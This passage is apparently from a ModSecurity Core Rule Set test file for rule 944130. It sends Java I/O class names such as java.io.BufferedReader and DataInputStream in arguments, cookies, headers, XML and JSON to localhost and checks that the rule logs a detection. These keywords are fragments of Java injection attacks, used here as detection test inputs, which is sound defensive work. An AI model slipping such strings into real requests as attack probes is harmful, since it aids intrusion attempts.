Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.BufferedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-38 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-39 desc: "XML element value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-40 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-41 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-42 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-43 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.BufferedReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-44 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-45 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-46 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.ByteArrayInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-47 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.ByteArrayInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-48 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.ByteArrayInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-49 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-50 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-51 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-52 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-53 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-54 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.ByteArrayInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-55 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-56 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-57 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.ByteArrayOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-58 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.ByteArrayOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-59 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.ByteArrayOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-60 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-61 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-62 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-63 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-64 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-65 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-66 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-67 desc: "Argument name includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.CharArrayReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-68 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.CharArrayReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-69 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.CharArrayReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-70 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.CharArrayReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-71 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-72 desc: "XML element value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-73 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-74 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: log_contains: "id \"944130\"" - test_title: 944130-75 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.CharArrayReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-76 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.CharArrayReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-77 desc: "Argument test includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-78 desc: "Argument name includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.DataInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-79 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.DataInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-80 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.DataInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-81 desc: "Request header test includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.DataInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-82 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-83 desc: "XML element value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-84 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-85 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-86 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 